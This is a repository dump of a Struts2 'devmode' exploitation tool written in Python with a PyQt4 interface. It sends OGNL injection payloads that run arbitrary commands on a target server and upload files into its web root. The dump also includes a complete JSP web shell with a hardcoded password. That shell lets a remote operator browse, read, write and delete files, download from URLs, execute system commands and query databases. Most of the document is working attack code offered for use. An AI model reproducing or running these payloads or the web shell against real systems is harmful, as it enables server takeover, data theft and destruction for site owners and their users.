"?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Go!St2" 22 | target_url = (self.address + payload) 23 | #print(target_url) 24 | try: 25 | req = urllib.request.Request(target_url, method = "GET") 26 | response = urllib.request.urlopen(req) 27 | if response: 28 | data = response.read() 29 | data = 
str(data, encoding = "utf-8") 30 | self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser 31 | except Exception as e: 32 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 33 | 34 | def cmd(self): 35 | self.command = str(self.ui.command.text()) 36 | payload= "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=" 37 | target_url = (self.address + payload + self.command) 38 | #print(target_url) 39 | try: 40 | req = urllib.request.Request(target_url, method = "GET") 41 | response = urllib.request.urlopen(req) 42 | data = response.read() 43 | data = str(data, encoding = "utf-8") 44 | self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser 45 | except Exception as e: 46 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 47 | 48 | def Go(self): 49 | self.address = str(self.ui.lineEdit.text()) 50 | if self.address: 51 | if self.address.find('://') == -1: 52 | self.address = 'http://' + self.address 53 | if self.ui.comboBox.currentIndex() == 0: 54 | self.PoC() 55 | if self.ui.comboBox.currentIndex() == 1: 56 | self.cmd() 57 | elif self.ui.comboBox.currentIndex() == 2: 58 | self.upload() 59 | 60 | def file_dialog(self): 61 | fd = QtGui.QFileDialog(self) 62 | self.file = fd.getOpenFileName() 63 | from os.path import isfile 64 | if isfile(self.file): 65 | import codecs 66 | text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框 67 | self.filename = str(self.ui.filename.text()) 68 | 69 | def upload(self): 70 | get_path = 
"?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=" 71 | target_url = (self.address + get_path) 72 | try: 73 | req = urllib.request.Request(target_url, method = "GET") 74 | response = urllib.request.urlopen(req) 75 | if response: 76 | data = response.read() 77 | data = str(data, encoding = "utf-8") 78 | except Exception as e: 79 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 80 | data = data.strip() 81 | #print(data) 82 | shellpath = data 83 | content = (open(self.file, "r").read()) 84 | #print(content) 85 | temp = "&reqobj=%s&reqobj=%s&content=%s" %(shellpath + "/" + self.filename, shellpath + "/" + self.filename, content) 86 | #print(temp) 87 | payload = "?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23parameters.reqobj[1],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.reqobj[2]),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&" 88 | target_url = (self.address + payload + temp) 89 | #print(target_url) 90 | try: 91 | #print(target_url) 92 | req = requests.get(target_url) 93 | data = req.content 94 | 
#print(data) 95 | data = str(data, encoding = "utf-8") 96 | self.ui.textBrowser.setText("上传成功,文件路径是:\n%s" %(shellpath + "/" + self.filename)) #将结果输出至textBrowser 97 | except Exception as e: 98 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 99 | 100 | def mode(self): 101 | self.ui.comboBox.currentIndex() 102 | 103 | 104 | 105 | if __name__ == "__main__": 106 | app = QtGui.QApplication(sys.argv) 107 | myapp = StartQt4() 108 | myapp.show() 109 | sys.exit(app.exec_()) 110 | -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/s2devmode.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Form implementation generated from reading ui file 's2devmode.ui' 4 | # 5 | # Created by: PyQt4 UI code generator 4.11.4 6 | # 7 | # WARNING! All changes made in this file will be lost! 8 | 9 | from PyQt4 import QtCore, QtGui 10 | 11 | try: 12 | _fromUtf8 = QtCore.QString.fromUtf8 13 | except AttributeError: 14 | def _fromUtf8(s): 15 | return s 16 | 17 | try: 18 | _encoding = QtGui.QApplication.UnicodeUTF8 19 | def _translate(context, text, disambig): 20 | return QtGui.QApplication.translate(context, text, disambig, _encoding) 21 | except AttributeError: 22 | def _translate(context, text, disambig): 23 | return QtGui.QApplication.translate(context, text, disambig) 24 | 25 | class Ui_MainWindow(object): 26 | def setupUi(self, MainWindow): 27 | MainWindow.setObjectName(_fromUtf8("MainWindow")) 28 | MainWindow.resize(866, 402) 29 | font = QtGui.QFont() 30 | font.setFamily(_fromUtf8("宋体")) 31 | font.setPointSize(10) 32 | font.setBold(True) 33 | font.setWeight(75) 34 | MainWindow.setFont(font) 35 | self.centralwidget = QtGui.QWidget(MainWindow) 36 | self.centralwidget.setObjectName(_fromUtf8("centralwidget")) 37 | self.lineEdit = QtGui.QLineEdit(self.centralwidget) 38 | self.lineEdit.setGeometry(QtCore.QRect(20, 20, 721, 31)) 39 | 
self.lineEdit.setObjectName(_fromUtf8("lineEdit")) 40 | self.pushButton = QtGui.QPushButton(self.centralwidget) 41 | self.pushButton.setGeometry(QtCore.QRect(760, 20, 71, 31)) 42 | self.pushButton.setObjectName(_fromUtf8("pushButton")) 43 | self.textBrowser = QtGui.QTextBrowser(self.centralwidget) 44 | self.textBrowser.setGeometry(QtCore.QRect(20, 120, 811, 221)) 45 | font = QtGui.QFont() 46 | font.setFamily(_fromUtf8("宋体")) 47 | self.textBrowser.setFont(font) 48 | self.textBrowser.setObjectName(_fromUtf8("textBrowser")) 49 | self.comboBox = QtGui.QComboBox(self.centralwidget) 50 | self.comboBox.setGeometry(QtCore.QRect(130, 70, 101, 31)) 51 | self.comboBox.setObjectName(_fromUtf8("comboBox")) 52 | self.comboBox.addItem(_fromUtf8("")) 53 | self.comboBox.addItem(_fromUtf8("")) 54 | self.comboBox.addItem(_fromUtf8("")) 55 | self.filename = QtGui.QLineEdit(self.centralwidget) 56 | self.filename.setGeometry(QtCore.QRect(580, 70, 131, 31)) 57 | self.filename.setObjectName(_fromUtf8("filename")) 58 | self.label = QtGui.QLabel(self.centralwidget) 59 | self.label.setGeometry(QtCore.QRect(460, 70, 101, 31)) 60 | font = QtGui.QFont() 61 | font.setFamily(_fromUtf8("宋体")) 62 | font.setPointSize(10) 63 | font.setBold(True) 64 | font.setWeight(75) 65 | self.label.setFont(font) 66 | self.label.setObjectName(_fromUtf8("label")) 67 | self.pushButton_2 = QtGui.QPushButton(self.centralwidget) 68 | self.pushButton_2.setGeometry(QtCore.QRect(720, 70, 111, 31)) 69 | self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) 70 | self.label_2 = QtGui.QLabel(self.centralwidget) 71 | self.label_2.setGeometry(QtCore.QRect(20, 70, 101, 31)) 72 | font = QtGui.QFont() 73 | font.setFamily(_fromUtf8("宋体")) 74 | font.setPointSize(10) 75 | font.setBold(True) 76 | font.setWeight(75) 77 | self.label_2.setFont(font) 78 | self.label_2.setObjectName(_fromUtf8("label_2")) 79 | self.label_3 = QtGui.QLabel(self.centralwidget) 80 | self.label_3.setGeometry(QtCore.QRect(260, 70, 61, 31)) 81 | 
self.label_3.setObjectName(_fromUtf8("label_3")) 82 | self.command = QtGui.QLineEdit(self.centralwidget) 83 | self.command.setGeometry(QtCore.QRect(330, 70, 111, 31)) 84 | self.command.setObjectName(_fromUtf8("command")) 85 | MainWindow.setCentralWidget(self.centralwidget) 86 | self.menubar = QtGui.QMenuBar(MainWindow) 87 | self.menubar.setGeometry(QtCore.QRect(0, 0, 866, 26)) 88 | self.menubar.setObjectName(_fromUtf8("menubar")) 89 | MainWindow.setMenuBar(self.menubar) 90 | self.statusbar = QtGui.QStatusBar(MainWindow) 91 | self.statusbar.setObjectName(_fromUtf8("statusbar")) 92 | MainWindow.setStatusBar(self.statusbar) 93 | 94 | self.retranslateUi(MainWindow) 95 | QtCore.QMetaObject.connectSlotsByName(MainWindow) 96 | 97 | def retranslateUi(self, MainWindow): 98 | MainWindow.setWindowTitle(_translate("MainWindow", "S2-devmode漏洞利用工具 Coder: crown prince", None)) 99 | self.pushButton.setText(_translate("MainWindow", "Go", None)) 100 | self.comboBox.setItemText(0, _translate("MainWindow", "PoC", None)) 101 | self.comboBox.setItemText(1, _translate("MainWindow", "执行命令", None)) 102 | self.comboBox.setItemText(2, _translate("MainWindow", "文件上传", None)) 103 | self.label.setText(_translate("MainWindow", "上传文件名:", None)) 104 | self.pushButton_2.setText(_translate("MainWindow", " 选择文件:", None)) 105 | self.label_2.setText(_translate("MainWindow", " 模式选择:", None)) 106 | self.label_3.setText(_translate("MainWindow", "命令:", None)) 107 | 108 | -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/手工测试.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/手工测试.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/手工测试2.png: -------------------------------------------------------------------------------- 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/文件上传2验证.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/站点2-执行命令.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/站点2-执行命令.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/编写参考.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/编写参考.txt -------------------------------------------------------------------------------- /Strust2漏洞 EXP代码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/Strust2漏洞 EXP代码.txt -------------------------------------------------------------------------------- /一句话木马(工具中可能使用).jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 | <%!String Pwd = "tz"; 3 | 4 | String EC(String s, String c) throws Exception { 5 | return s; 6 | }//new String(s.getBytes("ISO-8859-1"),c);} 7 | 8 | Connection GC(String s) throws Exception { 9 | String[] x = s.trim().split("\r\n"); 10 | Class.forName(x[0].trim()).newInstance(); 11 | Connection c = DriverManager.getConnection(x[1].trim()); 12 | if (x.length > 2) { 13 | c.setCatalog(x[2].trim()); 14 | } 15 | return c; 16 | } 17 | 18 | void AA(StringBuffer sb) throws Exception { 19 | File r[] = File.listRoots(); 20 | for (int i = 
0; i < r.length; i++) { 21 | sb.append(r[i].toString().substring(0, 2)); 22 | } 23 | } 24 | 25 | void BB(String s, StringBuffer sb) throws Exception { 26 | File oF = new File(s), l[] = oF.listFiles(); 27 | String sT, sQ, sF = ""; 28 | java.util.Date dt; 29 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 30 | for (int i = 0; i < l.length; i++) { 31 | dt = new java.util.Date(l[i].lastModified()); 32 | sT = fm.format(dt); 33 | sQ = l[i].canRead() ? "R" : ""; 34 | sQ += l[i].canWrite() ? " W" : ""; 35 | if (l[i].isDirectory()) { 36 | sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length() 37 | + "\t" + sQ + "\n"); 38 | } else { 39 | sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t" 40 | + sQ + "\n"; 41 | } 42 | } 43 | sb.append(sF); 44 | } 45 | 46 | void EE(String s) throws Exception { 47 | File f = new File(s); 48 | if (f.isDirectory()) { 49 | File x[] = f.listFiles(); 50 | for (int k = 0; k < x.length; k++) { 51 | if (!x[k].delete()) { 52 | EE(x[k].getPath()); 53 | } 54 | } 55 | } 56 | f.delete(); 57 | } 58 | 59 | void FF(String s, HttpServletResponse r) throws Exception { 60 | int n; 61 | byte[] b = new byte[512]; 62 | r.reset(); 63 | ServletOutputStream os = r.getOutputStream(); 64 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 65 | os.write(("->" + "|").getBytes(), 0, 3); 66 | while ((n = is.read(b, 0, 512)) != -1) { 67 | os.write(b, 0, n); 68 | } 69 | os.write(("|" + "<-").getBytes(), 0, 3); 70 | os.close(); 71 | is.close(); 72 | } 73 | 74 | void GG(String s, String d) throws Exception { 75 | String h = "0123456789ABCDEF"; 76 | int n; 77 | File f = new File(s); 78 | f.createNewFile(); 79 | FileOutputStream os = new FileOutputStream(f); 80 | for (int i = 0; i < d.length(); i += 2) { 81 | os 82 | .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d 83 | .charAt(i + 1)))); 84 | } 85 | os.close(); 86 | } 87 | 88 | void HH(String s, String d) throws Exception { 89 | File sf = new File(s), df = new 
File(d); 90 | if (sf.isDirectory()) { 91 | if (!df.exists()) { 92 | df.mkdir(); 93 | } 94 | File z[] = sf.listFiles(); 95 | for (int j = 0; j < z.length; j++) { 96 | HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 97 | } 98 | } else { 99 | FileInputStream is = new FileInputStream(sf); 100 | FileOutputStream os = new FileOutputStream(df); 101 | int n; 102 | byte[] b = new byte[512]; 103 | while ((n = is.read(b, 0, 512)) != -1) { 104 | os.write(b, 0, n); 105 | } 106 | is.close(); 107 | os.close(); 108 | } 109 | } 110 | 111 | void II(String s, String d) throws Exception { 112 | File sf = new File(s), df = new File(d); 113 | sf.renameTo(df); 114 | } 115 | 116 | void JJ(String s) throws Exception { 117 | File f = new File(s); 118 | f.mkdir(); 119 | } 120 | 121 | void KK(String s, String t) throws Exception { 122 | File f = new File(s); 123 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 124 | java.util.Date dt = fm.parse(t); 125 | f.setLastModified(dt.getTime()); 126 | } 127 | 128 | void LL(String s, String d) throws Exception { 129 | URL u = new URL(s); 130 | int n; 131 | FileOutputStream os = new FileOutputStream(d); 132 | HttpURLConnection h = (HttpURLConnection) u.openConnection(); 133 | InputStream is = h.getInputStream(); 134 | byte[] b = new byte[512]; 135 | while ((n = is.read(b, 0, 512)) != -1) { 136 | os.write(b, 0, n); 137 | } 138 | os.close(); 139 | is.close(); 140 | h.disconnect(); 141 | } 142 | 143 | void MM(InputStream is, StringBuffer sb) throws Exception { 144 | String l; 145 | BufferedReader br = new BufferedReader(new InputStreamReader(is)); 146 | while ((l = br.readLine()) != null) { 147 | sb.append(l + "\r\n"); 148 | } 149 | } 150 | 151 | void NN(String s, StringBuffer sb) throws Exception { 152 | Connection c = GC(s); 153 | ResultSet r = c.getMetaData().getCatalogs(); 154 | while (r.next()) { 155 | sb.append(r.getString(1) + "\t"); 156 | } 157 | r.close(); 158 | c.close(); 159 | } 160 | 161 | void OO(String s, 
StringBuffer sb) throws Exception { 162 | Connection c = GC(s); 163 | String[] t = { "TABLE" }; 164 | ResultSet r = c.getMetaData().getTables(null, null, "%", t); 165 | while (r.next()) { 166 | sb.append(r.getString("TABLE_NAME") + "\t"); 167 | } 168 | r.close(); 169 | c.close(); 170 | } 171 | 172 | void PP(String s, StringBuffer sb) throws Exception { 173 | String[] x = s.trim().split("\r\n"); 174 | Connection c = GC(s); 175 | Statement m = c.createStatement(1005, 1007); 176 | ResultSet r = m.executeQuery("select * from " + x[3]); 177 | ResultSetMetaData d = r.getMetaData(); 178 | for (int i = 1; i <= d.getColumnCount(); i++) { 179 | sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) 180 | + ")\t"); 181 | } 182 | r.close(); 183 | m.close(); 184 | c.close(); 185 | } 186 | 187 | void QQ(String cs, String s, String q, StringBuffer sb) throws Exception { 188 | int i; 189 | Connection c = GC(s); 190 | Statement m = c.createStatement(1005, 1008); 191 | try { 192 | ResultSet r = m.executeQuery(q); 193 | ResultSetMetaData d = r.getMetaData(); 194 | int n = d.getColumnCount(); 195 | for (i = 1; i <= n; i++) { 196 | sb.append(d.getColumnName(i) + "\t|\t"); 197 | } 198 | sb.append("\r\n"); 199 | while (r.next()) { 200 | for (i = 1; i <= n; i++) { 201 | sb.append(EC(r.getString(i), cs) + "\t|\t"); 202 | } 203 | sb.append("\r\n"); 204 | } 205 | r.close(); 206 | } catch (Exception e) { 207 | sb.append("Result\t|\t\r\n"); 208 | try { 209 | m.executeUpdate(q); 210 | sb.append("Execute Successfully!\t|\t\r\n"); 211 | } catch (Exception ee) { 212 | sb.append(ee.toString() + "\t|\t\r\n"); 213 | } 214 | } 215 | m.close(); 216 | c.close(); 217 | }%> 218 | 219 | 220 | <% 221 | String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + ""; 222 | request.setCharacterEncoding(cs); 223 | response.setContentType("text/html;charset=" + cs); 224 | String Z = EC(request.getParameter(Pwd) + "", cs); 225 | String z1 = EC(request.getParameter("z1") + "", cs); 226 | 
String z2 = EC(request.getParameter("z2") + "", cs); 227 | StringBuffer sb = new StringBuffer(""); 228 | try { 229 | sb.append("->" + "|"); 230 | if (Z.equals("A")) { 231 | String s = new File(application.getRealPath(request 232 | .getRequestURI())).getParent(); 233 | sb.append(s + "\t"); 234 | if (!s.substring(0, 1).equals("/")) { 235 | AA(sb); 236 | } 237 | } else if (Z.equals("B")) { 238 | BB(z1, sb); 239 | } else if (Z.equals("C")) { 240 | String l = ""; 241 | BufferedReader br = new BufferedReader( 242 | new InputStreamReader(new FileInputStream(new File( 243 | z1)))); 244 | while ((l = br.readLine()) != null) { 245 | sb.append(l + "\r\n"); 246 | } 247 | br.close(); 248 | } else if (Z.equals("D")) { 249 | BufferedWriter bw = new BufferedWriter( 250 | new OutputStreamWriter(new FileOutputStream( 251 | new File(z1)))); 252 | bw.write(z2); 253 | bw.close(); 254 | sb.append("1"); 255 | } else if (Z.equals("E")) { 256 | EE(z1); 257 | sb.append("1"); 258 | } else if (Z.equals("F")) { 259 | FF(z1, response); 260 | } else if (Z.equals("G")) { 261 | GG(z1, z2); 262 | sb.append("1"); 263 | } else if (Z.equals("H")) { 264 | HH(z1, z2); 265 | sb.append("1"); 266 | } else if (Z.equals("I")) { 267 | II(z1, z2); 268 | sb.append("1"); 269 | } else if (Z.equals("J")) { 270 | JJ(z1); 271 | sb.append("1"); 272 | } else if (Z.equals("K")) { 273 | KK(z1, z2); 274 | sb.append("1"); 275 | } else if (Z.equals("L")) { 276 | LL(z1, z2); 277 | sb.append("1"); 278 | } else if (Z.equals("M")) { 279 | String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 280 | Process p = Runtime.getRuntime().exec(c); 281 | MM(p.getInputStream(), sb); 282 | MM(p.getErrorStream(), sb); 283 | } else if (Z.equals("N")) { 284 | NN(z1, sb); 285 | } else if (Z.equals("O")) { 286 | OO(z1, sb); 287 | } else if (Z.equals("P")) { 288 | PP(z1, sb); 289 | } else if (Z.equals("Q")) { 290 | QQ(cs, z1, z2, sb); 291 | } 292 | } catch (Exception e) { 293 | sb.append("ERROR" + ":// " + e.toString()); 294 | } 295 | 
sb.append("|" + "<-"); 296 | out.print(sb.toString()); 297 | %> 298 | --------------------------------------------------------------------------------